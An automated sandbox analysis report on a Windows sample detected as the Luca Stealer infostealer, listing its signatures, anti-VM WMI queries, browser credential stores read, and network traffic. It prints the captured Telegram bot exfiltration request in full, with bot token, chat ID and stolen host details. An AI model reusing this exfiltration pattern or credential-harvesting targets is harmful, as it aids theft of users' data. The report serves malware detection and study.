
Windows Analysis Report
765iYbgWn9.exe

Overview

General Information

Sample name: 765iYbgWn9.exe (renamed because original name is a hash value)
Original sample name: 0534ab10184891cd61d262bfd79b7b4c.exe
Analysis ID: 1483815
MD5: 0534ab10184891cd61d262bfd79b7b4c
SHA1: a13d37959a92bc37f4d3c42eb53d77cc760f448a
SHA256: 191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
Tags: 64, exe, trojan

Detection

Luca Stealer
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w10x64
  • 765iYbgWn9.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\765iYbgWn9.exe" MD5: 0534AB10184891CD61D262BFD79B7B4C)
    • powershell.exe (PID: 8056 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
Source | Rule | Description | Author | Strings
765iYbgWn9.exe | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: 765iYbgWn9.exe PID: 7552 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
0.0.765iYbgWn9.exe.7ff62f040000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\765iYbgWn9.exe", ParentImage: C:\Users\user\Desktop\765iYbgWn9.exe, ParentProcessId: 7552, ParentProcessName: 765iYbgWn9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 8056, ProcessName: powershell.exe
No Snort rule has matched
Timestamp: 2024-07-29T07:38:58.167052+0200 | SID: 2039009 | Source Port: 443 | Destination Port: 60284 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-29T07:38:17.826882+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49706 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-29T07:38:45.004637+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 60283 | Protocol: TCP | Classtype: A Network Trojan was detected


AV Detection

Source: 765iYbgWn9.exe | ReversingLabs: Detection: 50%
Source: 765iYbgWn9.exe | Virustotal: Detection: 32%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60284 version: TLS 1.2
Source: 765iYbgWn9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: rust_stealer_xss.pdb | source: 765iYbgWn9.exe
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1 content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92dd content-length: 938035 accept: */* host: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1 accept: */* host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1 content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92dd content-length: 938035 accept: */* host: api.telegram.org
Source: 765iYbgWn9.exe | String found in binary or memory: http://ns.adobe.
Source: 765iYbgWn9.exe | String found in binary or memory: http://www.w3.or
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 765iYbgWn9.exe, 00000000.00000003.1963664259.00000270FAD21000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1963812730.00000270FCA20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 765iYbgWn9.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportC:
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 60284 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60284
Source: 765iYbgWn9.exe | Binary string: Afdfd\Device\Afd\Mio
Source: 765iYbgWn9.exe | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal72.troj.spyw.winEXE@4/15@3/2
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File created: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\
Source: 765iYbgWn9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\765iYbgWn9.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 765iYbgWn9.exe, 00000000.00000003.1884980962.00000270FACDA000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1885182766.00000270FACDA000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown | Process created: C:\Users\user\Desktop\765iYbgWn9.exe "C:\Users\user\Desktop\765iYbgWn9.exe"
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 765iYbgWn9.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 765iYbgWn9.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 765iYbgWn9.exe | Static file information: File size 5438976 > 1048576
Source: 765iYbgWn9.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3a4a00
Source: 765iYbgWn9.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x168200
Source: 765iYbgWn9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2529
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3521Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 2529 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 3521 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
          Source: CreditCardData.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: discord.comVMware20,11696494690f
          Source: CreditCardData.0.dr | Binary or memory string: AMC password management pageVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: CreditCardData.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: CreditCardData.0.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: CreditCardData.0.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
          Source: CreditCardData.0.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: CreditCardData.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: CreditCardData.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: CreditCardData.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: CreditCardData.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: CreditCardData.0.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
          Source: 765iYbgWn9.exe, 00000000.00000003.1889602220.00000270FCA95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: merica.comVMware20,11696494690|UE
          Source: CreditCardData.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
          Source: CreditCardData.0.dr | Binary or memory string: global block list test formVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: CreditCardData.0.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
          Source: CreditCardData.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: CreditCardData.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: CreditCardData.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: CreditCardData.0.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: CreditCardData.0.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
          Source: C:\Users\user\Desktop\765iYbgWn9.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
